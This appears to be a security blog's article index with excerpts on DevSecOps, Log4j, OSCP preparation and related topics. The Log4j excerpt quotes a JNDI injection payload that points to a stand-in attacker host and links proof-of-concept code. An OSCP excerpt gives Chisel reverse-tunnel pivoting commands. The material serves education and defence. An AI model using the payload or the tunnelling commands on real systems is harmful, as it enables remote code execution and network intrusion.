Feb 20

iOS Apps Security scanners practical comparison

In this article, I tried to overview: What iOS Apps Security Scanners exist on the market, What capabilities they provide, and what vulnerabilities they can discover. Given that new solutions and vulnerable applications often appear on the market, this article will be updated further. …

Security

5 min read

Jan 15

DevSecOps — What Security Controls exist and when to implement them?

In this short article, I tried to overview what Security Controls exists, what stage it can be added to the CI/CD process, and what benefits we receive. In simple words, DevSecOps is about adding different security controls at every step of your CI/CD process. The goal is to identify potential…

Devsecops

4 min read

Dec 22, 2021

Implementing Application Security on your project

The main purpose: CyberSecurity should help businesses succeed. Structure: 1. Main goal of Secure Software Development Life Cycle (SSDLC) 2. Controls that can be implemented on different stages of the Secure Software Development Life Cycle 3. What methods are the most effective in identifying vulnerabilities based on OWASP rating 4. Example of potential implementation…

Appsec

6 min read

Implementing Application Security on your project

Dec 10, 2021

Log4j 0-day RCE: Top companies affected

How it’s work: We send a specially formed request like $ {jndi: ldap: //attacker.host/blabla} to any place that can potentially be logged. JNDI (Java Naming and Directory Interface), in turn, processes the template, requests data via LDAP from attacker.host In the response, a JAVA class is given, which allows you to execute arbitrary code. PoC: https://github.com/tangxiaofeng7/apache-log4j-poc Log4j2 RCE BurpSuite Plugin: https://github.com/whwlsfb/Log4j2Scan

Rce

1 min read

Log4j 0-day RCE: Top companies affected

How it’s work:

We send a specially formed request like $ {jndi: ldap: //attacker.host/blabla} to any place that can potentially be logged.
JNDI (Java Naming and Directory Interface), in turn, processes the template, requests data via LDAP from attacker.host
In the response, a JAVA class is given, which allows you to execute arbitrary code.

PoC: https://github.com/tangxiaofeng7/apache-log4j-poc

Log4j2 RCE BurpSuite Plugin: https://github.com/whwlsfb/Log4j2Scan

What companies affected: https://github.com/YfryTchsGD/Log4jAttackSurface

Temporary fix: JAVA_OPTS = “- Dlog4j.formatMsgNoLookups = true”

Dec 10, 2021

FIX: Unable to locate package gitlab-ee

If you got “Unable to locate package gitlab-ee” error message, as displayed on the screenshot below Make the following two commands: Note: Don’t forget to change the domain. curl -L -o gitlab-ee_13.0.6.deb https://packages.gitlab.com/gitlab/gitlab-ee/packages/debian/buster/gitlab-ee_13.0.6-ee.0_amd64.deb/download.deb sudo EXTERNAL_URL=”http://gitlab.mcnz.com" apt install ./gitlab-ee_13.0.6.deb

Gitlab

1 min read

FIX: Unable to locate package gitlab-ee

If you got “Unable to locate package gitlab-ee” error message, as displayed on the screenshot below

Make the following two commands:

Note: Don’t forget to change the domain.

curl -L -o gitlab-ee_13.0.6.deb https://packages.gitlab.com/gitlab/gitlab-ee/packages/debian/buster/gitlab-ee_13.0.6-ee.0_amd64.deb/download.deb
sudo EXTERNAL_URL=”http://gitlab.mcnz.com" apt install ./gitlab-ee_13.0.6.deb

Dec 5, 2021

OSCP Preparation

Hi there, If you are reading this, you are most likely thinking about preparing and passing the OSCP exam. Why OSCP? It’s well known and highly respected cybersecurity certification. The OSCP exam is a 24 hours of proctored challenging hacking and 24 hour of detailed report writing with step-by-step explanation…

Oscp

2 min read

Dec 2, 2021

Buffer Overflow Preparation for OSCP

In this small article, I would like to describe the main steps in the most straightforward words and provide a short overview of “how the buffer overflow” might be done. You should be ready to solve this type of task for the OSCP exam. What you will have to work…

Oscp

4 min read

Nov 8, 2021

Pivoting OSCP: Chisel & Proxychains

Preconditions: Install Proxychains Install and compile Chisel Copy compiled Chisel binary to the entry point machine 1)From Kali: ./chisel server -p 8000 -reverse 2)From client: ./chisel client <Your_Kali_IP>:8000 R:8001:127.0.0.1:1337

Oscp

2 min read

Pivoting OSCP: Chisel & Proxychains

Preconditions:

Install Proxychains
Install and compile Chisel
Copy compiled Chisel binary to the entry point machine

1)From Kali:

./chisel server -p 8000 -reverse

2)From client:

./chisel client <Your_Kali_IP>:8000 R:8001:127.0.0.1:1337

Aug 20, 2021

How to Start with Container Security?

Hi, Container Security it’s something that looks very difficult at first glance. It is an extensive topic, but let’s try to look at it with an example and figure out what you can do to secure your container. In practice, there are some good tools for this(Clair, Anchore, Docker Scan…

Container Security

3 min read

Mar 24, 2021

How to start Static Application Security Testing(SAST) with SonarQube?

In practice, I have used different SAST solutions, and in my opinion, one of the best is Sonarqube. The advantages are: supports multiple programming languages, have different plugins that can increase the coverage, integration possibilities, and of course, a free community version. …

Sast

3 min read

iOS Apps Security scanners practical comparison

DevSecOps — What Security Controls exist and when to implement them?

Implementing Application Security on your project

Log4j 0-day RCE: Top companies affected

Log4j 0-day RCE: Top companies affected

FIX: Unable to locate package gitlab-ee

FIX: Unable to locate package gitlab-ee

OSCP Preparation

Buffer Overflow Preparation for OSCP

Pivoting OSCP: Chisel & Proxychains

Pivoting OSCP: Chisel & Proxychains

How to Start with Container Security?

How to start Static Application Security Testing(SAST) with SonarQube?

YevhSec1